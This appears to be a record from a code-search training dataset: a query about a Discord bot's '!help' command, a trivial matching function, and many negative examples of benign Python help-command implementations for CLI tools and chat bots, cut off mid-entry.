[ "0.8096221", "0.80244446", "0.7995032", "0.7823503", "0.7384904", "0.7376968", "0.72559196", "0.7244653", "0.7027462", "0.70059526", "0.6965059", "0.69347584", "0.6865889", "0.68443227", "0.6838706", "0.6834391", "0.68235415", "0.68076944", "0.67965454", "0.67949927", "0.673637", "0.673637", "0.67306", "0.6726609", "0.66893345", "0.66709757", "0.66625744", "0.66491467", "0.66244173", "0.6607118", "0.6567703", "0.6567703", "0.65262425", "0.65192264", "0.65134716", "0.64855", "0.647899", "0.64526916", "0.6449917", "0.6441995", "0.64403266", "0.6437109", "0.64324033", "0.6389654", "0.637861", "0.6365638", "0.6355285", "0.6334399", "0.63249046", "0.6312996", "0.6306648", "0.6299358", "0.6296493", "0.62924063", "0.6290568", "0.6288605", "0.62871", "0.6286396", "0.6286396", "0.62767327", "0.6270174", "0.6269", "0.6265381", "0.6238064", "0.62374544", "0.623738", "0.6225643", "0.6223159", "0.6219124", "0.6208915", "0.6206577", "0.618729", "0.617808", "0.6175303", "0.61747926", "0.6173345", "0.6173345", "0.61700964", "0.6160715", "0.6151498", "0.6145647", "0.61405915", "0.6139291", "0.6138384", "0.61099184", "0.6103785", "0.60952926", "0.60909075", "0.6087721", "0.60845184", "0.60832405", "0.60619926", "0.606013", "0.6054223", "0.60485566", "0.60416615", "0.60416615", "0.6038813", "0.6022923", "0.60111845" ]
0.71475893
8
Type !help {command} for more info on a command. You can also type !help {category} for more info on a category. For example, !help level (If you have the level plugin enabled!)
async def command(self,ctx): await ctx.send("Yes this is a command.")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def help_help(self):\n print(\"List commands or print details about a command\")", "def command_help(self, command):\n self.commands[command].command_help()", "def command_help(self, *args, **kwargs):\n print(\"Commands available:\\n\")\n for name in dir(self):\n if not name.startswith(\"command_\"):\n continue\n name_clean = name[len(\"command_\"):]\n print(\"%s:\\n - %s\\n\" % (name_clean, getattr(self, name).__doc__.strip()))", "def do_command_help(self, command):\n summary = self.base.commands[command].get_summary()\n usage = self.get_command_usage(command)\n description = self.base.commands[command].get_description()\n sys.stdout.write('%s\\n%s' % (summary, usage))\n if description != None:\n sys.stdout.write('Arguments Description:\\n%s\\n' %\n (description, ))", "def help(command=None):\n if command is None: \n # print first line of docstring\n for cmd in commands:\n ds = commands[cmd].__doc__.split('\\n')[0]\n print \"%-16s %s\" % (cmd,ds)\n else:\n print commands[command].__doc__", "def _help(self):\n self.onecmd('help')", "def cmd_help(args):", "def help():", "def help():\n \n pass", "async def _help(ctx, *, command_name: str=None):\n if command_name:\n command = bot.get_command(command_name)\n if not command:\n return await ctx.send(\"No such command!\")\n return await ctx.send(f\"```\\n{ctx.prefix}{command.name} {command.signature}\\n\\n{command.help or 'Missing description'}```\")\n description = []\n for name, cog in bot.cogs.items():\n entries = [\" - \".join([cmd.name, cmd.short_doc or \"Missing description\"]) for cmd in cog.get_commands() if await _can_run(cmd, ctx) and not cmd.hidden]\n if entries:\n description.append(f\"**{name}**:\")\n description.append(\"• \" + \"\\n• \".join(entries))\n await ctx.send(embed=discord.Embed(description=\"\\n\".join(description), color=ctx.me.color))", "def help_command(server, output, conf):\n server.tell(output.name, 'Available commands:')\n for key in COMMANDS.keys():\n cmd_func = COMMANDS[key]\n if cmd_func.__doc__:\n server.tell(output.name, '%s: %s' % (key[1:], cmd_func.__doc__))\n else:\n server.tell(output.name, key[1:])\n return", "def help():\n print(UI.HELP)", "def do_help(self, command_name):\n if not command_name:\n print _PVBlotInterp.__doc__\n print \"The following commands are supported:\"\n print \" \",\n blotish_commands = self._blotish_commands.keys()\n blotish_commands.sort()\n for c in blotish_commands:\n print c,\n print\n print\n print \"For more information on any command, try help <command>.\"\n return\n try:\n command = self.get_unique_command(command_name)\n print command.__doc__\n except blotish.BlotishError, err:\n blot_common.print_blot_error(err)", "def command_help(args):\n\tprint_usage()\n\treturn 0", "async def do_help(self, arg):\n if arg:\n if arg in self._commands:\n _, doc = self._commands[arg]\n print(doc)\n else:\n self.error('No command {}'.format(arg))\n else:\n print('Valid commands:')\n for c in self._commands:\n print(' ' + c)", "def show_help():\n pass", "def command_help(self):\n print(\"Command \", self)\n print(\"\\t\\thelp (Get help for command)\")\n\n params = self.params.copy()\n del params[\"help\"]\n\n if len(params) == 0:\n print(\"This command has no parameters\")\n return\n\n print(\"Parameters:\")\n for info in params.values():\n print(\" %s\" % info.get_basic_info())\n description = info.get_desc()\n if description != \"\":\n print(textwrap.fill(description,\n initial_indent=\" \",\n subsequent_indent=\" \",\n width=70))", "def help(self):\r\n self._short_help(None, None, 
None, None)", "def get_command_help(self, module_name, command_name):\r\n command = self.env.get_command(module_name, command_name)\r\n\r\n default_format = 'raw'\r\n if sys.stdout.isatty():\r\n default_format = 'table'\r\n\r\n arg_doc = command.__doc__\r\n\r\n if 'confirm' in command.options:\r\n arg_doc += \"\"\"\r\nPrompt Options:\r\n -y, --really Confirm all prompt actions\r\n\"\"\"\r\n\r\n if '[options]' in arg_doc:\r\n arg_doc += \"\"\"\r\nStandard Options:\r\n --format=ARG Output format. [Options: table, raw] [Default: %s]\r\n -C FILE --config=FILE Config file location. [Default: ~/.softlayer]\r\n --debug=LEVEL Specifies the debug noise level\r\n 1=warn, 2=info, 3=debug\r\n --timings Time each API call and display after results\r\n --proxy=PROTO:PROXY_URL HTTP[s] proxy to be use to make API calls\r\n -h --help Show this screen\r\n\"\"\" % default_format\r\n return arg_doc.strip()", "def help(self):", "def help(self):", "def help(self):\n pass", "def help(self):\n pass", "def help(self, args):\n print('No commands available for this consumer')", "def help():\n print \"Help comes to those who ask\"", "def cmd_help(ctx):\n echo(ctx.parent.get_help())", "async def help(self, ctx, *, command_name: str=None):\n bot_prefix = '@Randy '\n # Shortcut to command search\n if command_name is not None:\n return await ctx.invoke(self.cmd('help command'), cmd_name=command_name)\n\n em = discord.Embed(title='Help',\n description='**Permissions:** The permissions required to function :-\\n'\n '`Send Messages`, `Manage Messages`, `Embed Links`\\n'\n '--\\nTo get help or more information on a specific command, use:\\n'\n '`{bot_prefix}help <command name>`\\n'\n '--\\nRead my messy code [here](http://github.com/xKynn/RandomRumble)'\n '--\\nIf you like my work and would like to help me, '\n 'Ko-Fi/Paypal: [Link](https://ko-fi.com/D1D6EXXV)\\n',\n color=self.color)\n\n em.set_footer(text=\"Contact me at Demo#7645\")\n\n # This can't go in the init because help isn't loaded last & thus misses some commands\n em.add_field(name=\"Commands\", value=' • '+'\\n • '.join(f\"***{c.name}*** - {c.short_doc}\" for c in self.bot.commands if\n c.name not in ['pob', 'link', 'convert']))\n try:\n await ctx.send(embed=em)\n except:\n await ctx.send(\"`Embed Links` permission is required to see the help!\")", "def command_short():\n pass", "def help_util():\r\n for cmd, f in COMMANDS.items():\r\n print(\"POM \" + cmd + \":\")\r\n print(f.__doc__.lstrip(\"\\n\"))", "def test_cli_help(self):\n output = self.update_command('-h')", "async def send_command_help(self, command):\n ctx = self.context\n embed = discord.Embed(title=command.name.upper(), description=command.description, color=discord.Color.green())\n alias = command.aliases\n if alias:\n embed.add_field(name=\"Aliases\", value=\", \".join(alias), inline=False)\n if command.usage != None:\n embed.add_field(name=\"How to use:\", value=f'`{command.usage}`')\n\n await ctx.reply(embed=embed)", "def command_help(self, bot, update):\n\n messages = [\n 'Available commands:',\n '/who - Who is Myles?',\n '/where - Where is Myles?',\n '/tweet - What was the last tweet Myles sent?',\n '/photo - What was the last Instagram photo Myles took?',\n '/web - Where can I find Myles on the interwebs?',\n ]\n\n self.send_messages(bot, update, messages)", "def printhelp():", "def print_help(self):\n\n print((\"Help is not defined for command \" + self.command))", "async def help(self, *args, **kwargs):\n if len(args) == 0:\n return self.help.__doc__\n docs = []\n for command in args:\n if 
command in self.user_special_bang_set:\n docs.append(self.user_special_bang_set[command].bang_skill.__doc__)\n elif command in self.control_bang_set:\n docs.append(self.control_bang_set[command].bang_skill.__doc__)\n\n return \"| \".join(docs)", "def CommandHelp(paser):\n\n\tprint \"\\n===============Commands List===============\\n\"\n\t\t\n\tprint \"NewProject - {}\".format(NewProject.__doc__)\n\tprint \"DelProject - {}\".format(DelProject.__doc__)\n\tprint \"ShareProject - {}\".format(ShareProject.__doc__)\n\tprint \"StopProject - {}\".format(StopProject.__doc__)\n\tprint \"Help - {}\".format(CommandHelp.__doc__)\n\tprint \"Exit - Finaliza la sesion en la terminal.\"", "def _help():\n text = \"\"\"\n```\nUsage: @bot [command] (message)\n\n*Commands*:\n \n add Adds specified users to notify list | To add yourself use key 'myself'\n list Lists users on notify list\n remove Removes specified users from notify list | To remove yourself use key 'myself'\n help This help\n\n > Obs: All commands are optional\n\n*Examples*:\n\n @bot add myself @Fulano <= Will add yourself and @Fulano in list.\n @bot this a messge test <= Send 'this a messge test' to all list.\n @bot remove myself @Fulano <= Remove yourself and @fulano from list.\n\n```\n\"\"\"\n return text", "def help(cmd, cmdArgs):\n global commandDict\n retInfo = []\n if len(cmdArgs) > 0:\n #return help on a single function\n if cmdArgs[0] in commandDict.keys():\n return commandDict[cmdArgs[0]].__doc__\n\n #else, return general info\n retInfo = ['pypeople: A command line tool for vCard management',\n 'Version:' + __version__,\n 'Available Commands:']\n #fill in more info here\n for cmdName in commandDict.keys():\n cmdFunc = commandDict[cmdName]\n cmdDoc = str(cmdName) + ': ' + str(cmdFunc.__doc__) if cmdFunc.__doc__ is not None else 'Undocumented Function'\n retInfo.append('\\t' + cmdDoc)\n\n return '\\n'.join(retInfo)", "def print_generic_help():\r\n print ART_NAME\r\n print 'Version {1}\\nby {2}'.format(NAME, VERSION, AUTHOR)\r\n print DESCRIPTION\r\n tools = sorted(AvailableCommands.commands.keys(), key=lambda v: v.upper())\r\n # Do not show CUSTOM command in the help\r\n tools.remove('CUSTOM')\r\n tools.remove('CUSTOM_NO_OUTPUT')\r\n print '\\n\\nSupported tools are:\\n{0}'.format('\\n'.join(tools))\r\n print '\\nHint: Check tool specific help with --help <tool_name>\\n'", "async def help(ctx, command:str=None):\n if command == None:\n embed = assemble_embed(\n title=\"Looking for help?\",\n desc=(\"Hey there, I'm a resident bot of Scioly.org!\\n\\n\" +\n \"On Discord, you can send me commands using `!` before the command name, and I will process it to help you! \" +\n \"For example, `!states`, `!events`, and `!fish` are all valid commands that can be used!\\n\\n\" +\n \"If you want to see some commands that you can use on me, just type `!list`! 
\" +\n \"If you need more help, please feel free to reach out to a staff member!\")\n )\n return await ctx.send(embed=embed)\n hlp = await get_help(ctx, command)\n await ctx.send(embed=hlp)", "def help(self, msg=None):\n\n # Print the message if given.\n if not msg == None:\n print str(msg) + \"\\n\"\n\n # Display the list of commands, in the alphabetical order.\n print \"Use one of the following commands:\"\n for action in sorted(self.actions.keys()):\n info = self.actions[action]\n joined_oblig = ' '.join(info['required'])\n if len(info['additional']) > 0:\n add = [\"<%s>\" % x for x in info['additional']]\n joined_add = '[' + ' '.join(add) + ']'\n else:\n joined_add = ''\n print \"\\t* %s %s %s\" % (action, joined_oblig, joined_add)", "def help_command(update: Update, _: CallbackContext) -> None:\n update.message.reply_text(\"These are the list of commands supported. \\n\\n /deadlines. \\n\\n \"\n \"Hey! I am still being enhanced, more features to come...!\")", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(\"Laughybot\\n\\n VERSION\\n 0.1 \\n\\nUSAGE\\n /{command} : Entrer une commande parmi celles disponibles\\n\\nCOMMADES\\n/joke => recherche une blague sur la toile\\n/start => Affiche le message d'accueil\\n/help => Affiche l'aide\")", "def get_help(self,command):\n if \"help\" in self.commands[command]:\n return self.commands[command][\"help\"]\n else:\n return \"No help defined for this command.\"", "def do_help(self, args): \n if args.command:\n if len(args.command) > 1:\n command = args.command[0] +\"-\" + args.command[1]\n else:\n command = args.command[0]\n if command in self.subcommands:\n self.subcommands[command].print_help()\n else:\n print((\"'%s' is not a valid subcommand\") %\n args.command)\n else:\n self.parser.print_help()", "def help_command(update, context):\n update.message.reply_text('Help!')", "def get_help(self) -> None: \n print(messages.get_help())", "async def help(self, ctx):\n self.log_command_call(\"help\", ctx.message)\n await ctx.send(HELP_TEXT)\n embed_output = create_embed(description=MORE_INFO_TEXT)\n await ctx.send(embed=embed_output)", "def dispatch_help(args):\n command = args.subcommand\n if command is None:\n command = 'help'\n args.parsers[command].print_help()\n\n cmd_func = getattr(EtcMaint, 'cmd_%s' % command, None)\n if cmd_func:\n lines = cmd_func.__doc__.splitlines()\n print('\\n%s\\n' % lines[0])\n paragraph = []\n for l in dedent('\\n'.join(lines[2:])).splitlines():\n if l == '':\n if paragraph:\n print('\\n'.join(wrap(' '.join(paragraph), width=78)))\n print()\n paragraph = []\n continue\n paragraph.append(l)\n if paragraph:\n print('\\n'.join(wrap(' '.join(paragraph), width=78)))", "def print_specific_help(tool_name):\r\n if tool_name not in AvailableCommands.commands:\r\n print 'Command is not supported: {0}'.format(tool_name)\r\n return\r\n cmd = AvailableCommands.commands[tool_name]\r\n\r\n print 'Usage of {0}:'.format(cmd.name)\r\n print '\\nAccepted input types:\\n{0}'.format(str(list(cmd.input_types)))\r\n print '\\nOutput types:\\n{0}'.format(str(cmd.output_types))\r\n print '\\nMandatory arguments:\\n{0}'.format(str(cmd.user_mandatory_args))\r\n print '\\nOptional arguments:\\n{0}'.format(str(cmd.user_optional_args))\r\n print '\\nParallelizable:\\n{0}'.format(str(cmd.parallelizable))\r\n print '\\nAdditional description:\\n{0}'.format(str(cmd.help_description))\r\n print ''", "def display_help(self):\n pass", "async def help_command(self, ctx, *, cmd_name: str=None):\n 
bot_prefix = '@Randy '\n # Get command object\n cmd_obj = self.cmd(cmd_name)\n\n # Handle no command found\n if cmd_obj is None:\n return await ctx.error(f'Command {cmd_name} not found')\n em = discord.Embed(title=cmd_obj.name, description=cmd_obj.help, color=self.color)\n\n # Input aliases and parameters to embed\n if cmd_obj.aliases:\n em.add_field(name='Aliases', value='\\n'.join([f'\\u2022 {x}' for x in cmd_obj.aliases]))\n if cmd_obj.clean_params:\n em.add_field(name='Parameters', value='\\n'.join([f'\\u2022 {x}' for x in cmd_obj.clean_params]))\n\n # Handle group commands\n if isinstance(cmd_obj, commands.core.Group):\n em.add_field(name='Group commands',\n value='\\n'.join([f'\\u2022 {x}' for x in cmd_obj.commands]),\n inline=False)\n\n # Add usage last\n em.add_field(name='Usage',\n value=f'```{bot_prefix}\\u200b{cmd_name} '\n f'{\" \".join([f\"<{x}>\" for x in cmd_obj.clean_params])}```',\n inline=False)\n\n await ctx.send(embed=em)", "def showHelp(self):\n\t\tfor i in range(0,20):\n\t\t\tprint \"\"\n\t\tprint \" _ _ \"\n\t\tprint \"| | | | \"\n\t\tprint \"| |__ _ __ ___ | |__ \"\n\t\tprint \"| '_ \\ | '_ \\ / __|| '_ \\ \"\n\t\tprint \"| | | || | | |\\__ \\| | | |\"\n\t\tprint \"|_| |_||_| |_||___/|_| |_|\"\n\t\tprint \"A program by Scott Jackson\"\n\t\tprint \"\"\n\t\tprint \"To enter a command, type the key and press Return.\"\n\t\tprint \"NB: parentheses indicate which of two options is the default.\"\n\t\tprint \"\"\n\t\tprint \"Basic Commands:\"\n\t\tprint \"j / k -- show lower-ranked / higher-ranked stories.\"\n\t\tprint \"r -- get the latest stories from Hacker News.\"\n\t\tprint \"q -- quit.\"\n\t\tprint \"# -- open story number # in your web browser.\"\n\t\tprint \"c# -- open comments for story number # in your web browser.\"\n\t\tprint \"#+ -- open up story number # AND its comments in your web browser.\"\n\t\tprint \"top / new -- switch between showing the top and newest stories on HN. (top)\"\n\t\tprint \"c / e -- collapse stories you've already read / don't collapse them. (e)\"\n\t\tprint \"u -- update hnsh to the latest version.\"\n\t\tprint \"==========================\"\n\t\tprint \"For more commands, see the man.txt file.\"\n\t\tinput = raw_input(\"Press Return to go back to the Hacker News stories.\")", "def help(self, irc, msg, args, command):\n command = map(callbacks.canonicalName, command)\n (maxL, cbs) = irc.findCallbacksForArgs(command)\n if maxL == command:\n if len(cbs) > 1:\n names = sorted([cb.name() for cb in cbs])\n irc.error(format('That command exists in the %L plugins. 
'\n 'Please specify exactly which plugin command '\n 'you want help with.', names))\n else:\n assert cbs, 'Odd, maxL == command, but no cbs.'\n irc.reply(cbs[0].getCommandHelp(command, False))\n else:\n irc.error(format('There is no command %q.',\n callbacks.formatCommand(command)))", "def help(self):\n\t\treturn", "def help(ctx):\n click.echo(ctx.parent.get_help())", "def help_command(update: Update, _: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, _: CallbackContext) -> None:\n update.message.reply_text('Help!')", "async def do_help():\n\n if len(message.content.split()) > 1:\n for i in cmd_dict:\n if message.content.split()[1] == i:\n await bot.send_message(c, f'Help for {i}: {cmd_dict[i].__doc__}')\n return\n\n cmdstr = 'Commands: '\n for i in cmd_dict:\n cmdstr += '{}, '.format(i)\n await bot.send_message(c, cmdstr)", "def help(self, cmd=\"\", *, fail=\"\"):\n class_dict = dict(type(self).__dict__)\n # Add this function to class, so that when subclassing,\n # help for help is found\n class_dict.update({\"help\": self.help})\n if cmd.startswith(self.predicate):\n # Strip predicate\n cmd = cmd[len(self.predicate) :]\n # Check that command exists and is not\n # private, protected or special method\n if (not cmd.startswith(\"_\")) and cmd in class_dict.keys():\n item = class_dict[cmd]\n if callable(item):\n if item.__doc__:\n return \"Help on command '{}':\\n. {}\".format(\n cmd, \"\\n. \".join(cleandoc(item.__doc__).split(\"\\n\"))\n )\n return \"No help on command '{}'\".format(cmd)\n # If no cmd given or wrong cmd given, return commands\n commands = []\n for key, value in class_dict.items():\n if not key.startswith(\"_\"):\n if callable(value):\n commands.append(key)\n msg = (\n \"Commands:\\n {}\".format(\", \".join(commands))\n + \"\\n for more help on command, use \"\n + \"{}help command\".format(self.predicate)\n )\n if fail:\n msg = fail + \"\\n\" + msg\n return msg", "def help():\n version()\n print(\"USAGE: python3 notes.py [COMMAND]\")\n print(\"COMMAND:\")\n help_dict = {\n \"help\": \"Prints out the help text.\",\n \"version\": \"Prints out the version.\",\n \"init\": \"Initializes a new set of notes.\",\n \"modify\": \"Modify the current set of notes.\",\n }\n help_dict = OrderedDict(sorted(help_dict.items()))\n for entry in help_dict:\n print((\" \" + entry).ljust(10), help_dict[entry])", "def do_help(self, message):\r\n\t\tcommands = [command[3:] for command in dir(self) if command.startswith('do_')]\r\n\t\t# self.trace(f'Help: {\", \".join(commands)}')\r\n\r\n\t\tfor command in commands:\r\n\t\t\tmethod = getattr(self, f'do_{command}')\r\n\t\t\tcommand_help = getattr(method, '__doc__')\r\n\t\t\tif command_help:\r\n\t\t\t\tself.trace(f'{command}: {command_help}')", "def help_command(update: Update, context: CallbackContext) -> None:\n commands = [\"/login <pwd>\\n\",\n \"/status\\n\",\n \"/heat\\n\",\n \"/temp\\n\",\n \"/off\\n\",\n \"/help\\n\",\n \"/set\\n\",\n \"/unset\\n\",\n \"/heatmore\\n\",\n \"/lighton\\n\",\n \"/lightoff\\n\"]\n\n cmd: str = \" \".join(commands)\n update.message.reply_text('commands are:\\n' + cmd)", "def Help(topic=None):\n\n if not topic:\n print \"Avaliable commands are: \"\n print \"\\n\".join(map(lambda x:\" \"*3+x, filter(lambda c:c!=\"help\", commands)))\n print \"Type help command to get help with a specific command.\"\n\n elif topic in commands:\n print \"Help for %s:\"%topic\n print commands[topic].__doc__", "def do_help(self, arg):\n if arg:\n # Getting help for a specific command\n 
funcname = self._func_named(arg)\n if funcname:\n # No special behavior needed, delegate to cmd base class do_help()\n cmd.Cmd.do_help(self, funcname[3:])\n else:\n # Show a menu of what commands help can be gotten for\n self._help_menu()", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def show_help(message, commands):\n commands_help = [\n {\n 'name': 'help',\n 'text': 'show this help message.'\n },\n ]\n\n commands_help.extend((c.help for key, c in commands.items()))\n command_text = '\\n'.join([' {0[name]:<12}{0[text]}'.format(cmd)\n for cmd in commands_help])\n help_message = '**redditfy-bot** available commands:\\n{}'.format(command_text)\n print(help_message)\n return help_message", "def help_command(update: Update) -> None:\n #update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\r\n update.message.reply_text('Help!')", "async def help(self, args):\n if not args:\n maxw = max([len(x) for x in self.commands]) + 1\n commands = list(self.commands)\n commands.sort()\n message = '\\n'.join(['`{name:{width}}|` {desc}'.format(\n name=command, width=maxw,\n desc=(self.commands[command].__doc__ or 'No description.').splitlines()[0]\n ) for command in commands])\n await self.send(\"Unlisted commands are forwarded to the Minecraft server.\\n\" + message)\n elif args.lower() not in self.commands:\n await self.send_error(\"Unknown command: {command}. This might be a Minecraft command.\".format(command=args))\n else:\n args = args.lower()\n await self.send(\"**`{name}`** - {doc}\".format(name=args, doc=self.commands[args].__doc__ or 'No description.'))", "def help(self):\n help = ''\n cmds = [(x, y) for x, y in Commands.__dict__.iteritems()]\n cmds.sort(key=lambda x: x[0])\n for name, member in cmds:\n if name.startswith('cmd_') and callable(member):\n help += ' %s\\n' % ' '.join([name[4:]] +\n ['<%s>' % x for x in\n inspect.getargspec(member).args[1:]])\n if member.__doc__:\n help += ' %s\\n' % member.__doc__.splitlines()[0]\n return 'Available commands:\\n%s' % help", "def help_command(update, context):\n update.message.reply_text('Let me help you. \\r\\n /help print this help \\r\\n /safety prints safety instructions \\r\\n /play start the game\\r\\n /joingroup Join CTF tg group')", "def help(ctx, topic, **kw):\n # The help command implementation is taken from\n # https://www.burgundywall.com/post/having-click-help-subcommand\n if topic is None:\n click.echo(ctx.parent.get_help())\n else:\n click.echo(main.commands[topic].get_help(ctx))", "async def getHelp(ctx, cmd):\n wikiMods = discord.utils.get(ctx.message.author.guild.roles, name=\"Wiki Moderator\")\n cmdInfo = next((c for c in COMMAND_INFO if c[\"name\"] == cmd or cmd in c[\"aliases\"]), None)\n if cmdInfo == None:\n return assembleEmbed(\n title=f\"`{cmd}`\",\n desc=\"Cannot find command with this name. 
Try again buddy.\",\n webcolor=\"red\"\n )\n else:\n roles = [(discord.utils.get(ctx.message.author.guild.roles, name=r)) for r in cmdInfo['access']]\n commandFields = [\n {\n \"name\": \"Parameters\",\n \"value\": \"\\n\".join([f\"`{p['name']}` - {p['description']}\" for p in cmdInfo['parameters']]) if len(cmdInfo['parameters']) > 0 else \"`none`\",\n \"inline\": False\n }\n ]\n # If command has flags show those, if not do nothing\n if 'flags' in cmdInfo:\n commandFields.append({\n \"name\": \"Flags\",\n \"value\": \"\\n\".join([f\"`-{u['name']}` - {u['description']}\" for u in cmdInfo['flags']]),\n \"inline\": False\n })\n # Add available roles\n commandFields.extend([\n {\n \"name\": \"Usage\",\n \"value\": \"\\n\".join([f\"`{u['cmd']}` - {u['result']}\" for u in cmdInfo['usage']]),\n \"inline\": False\n },\n {\n \"name\": \"Available To\",\n \"value\": \"\\n\".join([f\"{r.mention}\" for r in roles]),\n \"inline\": False\n }\n ]\n )\n return assembleEmbed(\n title=f\"`!{cmdInfo['name']}`\",\n desc=f\"{cmdInfo['description']}\",\n fields=commandFields,\n webcolor=\"gold\"\n )", "def HelpCommand(self, unused_args, unused_sub_opts=None, unused_headers=None,\n unused_debug=None):\n self.OutputUsageAndExit()", "def print_help():\n\tprint(\"Help text\")", "async def help(self, ctx, *, command: str = None):\n try:\n if command is None:\n p = await HelpPaginator.from_bot(ctx)\n else:\n new_names = {\"Infamous RPG v2\": \"Rpg2\", \"Image Manipulation\": \"Imagem\"}\n if command in new_names.keys():\n command = new_names[command]\n entity = self.bot.get_cog(command) or self.bot.get_command(command)\n\n if entity is None:\n clean = command.replace('@', '@\\u200b')\n return await ctx.send(f'Looks like \"{clean}\" is not a command or category.')\n elif isinstance(entity, commands.Command):\n p = await HelpPaginator.from_command(ctx, entity)\n else:\n p = await HelpPaginator.from_cog(ctx, entity)\n\n await p.paginate()\n except Exception as e:\n await ctx.send(e)", "def do_help(self, arg):\n\t\tif arg:\n\t\t\tfuncarg = arg.replace(\" \", \"_\")\n\t\t\ttry:\n\t\t\t\tfunc = getattr(self, 'help_' + funcarg)\n\t\t\texcept AttributeError:\n\t\t\t\ttry:\n\t\t\t\t\tdoc=getattr(self, 'do_' + funcarg).__doc__\n\t\t\t\t\tif doc:\n\t\t\t\t\t\t\tself.stdout.write(\"%s\\n\"%str(doc))\n\t\t\t\t\t\t\treturn\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tpass\n\t\t\t\tself.stdout.write(\"%s\\n\"%str(self.nohelp % (arg,)))\n\t\t\t\treturn\n\t\t\tfunc()\n\t\telse:\n\t\t\tprint \"\\nAvailable commands (type help <topic> for help on topic):\\n\"\n\t\t\tnames = self.get_names()\n\t\t\tfor name in sorted(names):\n\t\t\t\tif name[:3] == \"do_\":\n\t\t\t\t\tname = name[3:]\n\t\t\t\t\tif name == \"EOF\":\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tself.parent.printHelpLine(name, \"\", getattr(self, \"do_\" + name).__doc__ or \"\")\n\t\t\tprint \"\"", "async def get_help(ctx, commandename=\"\"):\n to_send = \"\"\"\\n> \\n> **Commands List** : \\n\"\"\"\n to_send += \"> \\n\"\n for commande in client.commands:\n to_send += \"> \\n\"\n to_send += f\"\"\"> `!{commande.name}` : {commande.description}\\n\"\"\"\n\n to_send += \"> \\n\"\n to_send += f\"\"\"> _Bot created for the **Ursina** discord server_ \\n\"\"\"\n await ctx.send(content=to_send)", "def do_help(self, args):\n ## The only reason to define this method is for the help text in the doc string\n cmd.Cmd.do_help(self, args)", "def do_help(self, args):\n ## The only reason to define this method is for the help text in the doc string\n cmd.Cmd.do_help(self, args)", "def help(self) -> 
str:\n\t\treturn None", "def DoHelp(options, args):\n __pychecker__ = 'unusednames=options'\n if len(args) == 1 and args[0] in COMMAND_USAGE_TEXT:\n print(COMMAND_USAGE_TEXT[args[0]])\n else:\n raise gclient_utils.Error(\"unknown subcommand '%s'; see 'gclient help'\" %\n args[0])", "def help(command = None):\n if command is None:\n option = \" {:12} {}\"\n help_text = [\n \"Usage: tracker <command> [<args>]\",\n \"\",\n \"Available commands:\",\n option.format(\"help\", \"display this dialog\"),\n option.format(\"update\", \"save data to tracker\"),\n option.format(\"list\", \"list available trackers\"),\n option.format(\"show\", \"display raw tracker data\"),\n option.format(\"rename\", \"rename tracker\"),\n option.format(\"delete\", \"remove tracker\"),\n option.format(\"stats\", \"show statistics\"),\n option.format(\"plot\", \"show graph\"),\n \"\",\n \"Use 'tracker help <command>' for a command's detailed usage.\"\n ]\n print(\"\\n\".join(help_text))\n else:\n # commands = [\"update\", \"list\", \"show\", \"rename\", \"delete\", \"stats\", \"plot\"]\n usage = \" {}\"\n desc = \" {}\"\n if command == \"update\":\n help_text = [\n \"Update: command which adds (numerical) data to a tracker.\",\n \"\",\n \"Usage:\",\n usage.format(\"tracker update <tracker> <data>\"),\n usage.format(\"tracker update <tracker>\"),\n \"\",\n \"Description:\",\n usage.format(\"tracker update <tracker> <data>\"),\n desc.format(\"This form is shorthand for saving <data> to \" +\n \"<tracker> for today's date.\"),\n \"\",\n usage.format(\"tracker update <tracker>\"),\n desc.format(\"This form is used to set the value for an \" +\n \"arbitrary date for <tracker>.\"),\n desc.format(\"The date must be in the format YYYY-MM-DD.\"),\n \"\",\n \"Options:\",\n usage.format(\"<tracker>\"),\n desc.format(\"The name of the tracker to update, converted to lowercase.\"),\n desc.format(\"If <tracker> does not exist, you will be prompted to create it.\"),\n \"\",\n usage.format(\"<data>\"),\n desc.format(\"The value to save to the tracker to update, must be numerical.\")\n ]\n elif command == \"list\":\n help_text = [\n \"List: displays a list of trackers which have been created\",\n \"\",\n \"Usage:\",\n usage.format(\"tracker list\")\n ]\n elif command == \"show\":\n help_text = [\n \"Show: displays raw dates and values for a tracker\",\n \"\",\n \"Usage:\",\n usage.format(\"tracker show <tracker>\"),\n \"\",\n \"Description:\",\n usage.format(\"tracker show <tracker>\"),\n desc.format(\"Displays all data for <tracker> in the form '<date> | <value>'.\"),\n desc.format(\"Note: <date> is formatted as 'YYYY-MM-DD'.\"),\n \"\",\n \"Options:\",\n usage.format(\"<tracker>\"),\n desc.format(\"The name of the tracker to show, converted to lowercase.\"),\n ]\n elif command == \"rename\":\n help_text = [\n \"Rename: change name of a tracker\",\n \"\",\n \"Usage:\",\n usage.format(\"tracker rename <tracker> <new_tracker>\"),\n \"\",\n \"Description:\",\n usage.format(\"tracker rename <tracker> <new_tracker>\"),\n desc.format(\"All <tracker> entries will not be <new_tracker> entries.\"),\n \"\",\n \"Options:\",\n usage.format(\"<tracker>\"),\n desc.format(\"The name of the existing tracker to change, converted to lowercase.\"),\n \"\",\n usage.format(\"<new_tracker>\"),\n desc.format(\"The name of the new tracker (must not already exist), converted to lowercase.\")\n ]\n elif command == \"delete\":\n help_text = [\n \"Delete: permanently removes all data entries for a given tracker\",\n \"\",\n \"Usage:\",\n usage.format(\"tracker 
